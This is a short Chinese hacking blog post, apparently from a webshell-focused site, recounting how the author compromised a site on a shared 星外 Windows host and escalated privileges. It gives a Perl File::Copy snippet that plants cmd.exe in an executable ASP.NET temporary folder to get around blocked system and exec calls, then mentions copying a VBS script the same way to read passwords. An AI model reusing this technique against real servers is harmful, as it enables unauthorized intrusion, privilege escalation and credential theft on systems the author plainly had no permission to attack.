前几天和谐一个站,独立服务器,就一个站,想提权应该不难。后来发现是坑爹的星外啊。草了啥目录多没权限执行。

翻来翻去翻到个PERL目录,这东西玩的少。在百度搜到一篇吐司发的文章,利用方法拿了权限。文章如下:

目标可写目录无执行权限.装有PERL。有运行权限。但system,exec,“,这几个函数没有权限。

注意PERL并非系统权限。而是继承的nt authority\network service权限,所以默认比web权限略的高点。

 

利用perl的copy 函数
use File::Copy;
$a=’d:\web\cmd.exe’;
$ac=’c:/windows/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/*******/********/hash/cmd.exe’;
copy($a, $ac) or die “Copy failed: $!”;
print ‘ok’;

 

成功写入:

 

执行命令成功:

 

然后就是用上面复制的方法把VBS整上去。读密码了。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2379.html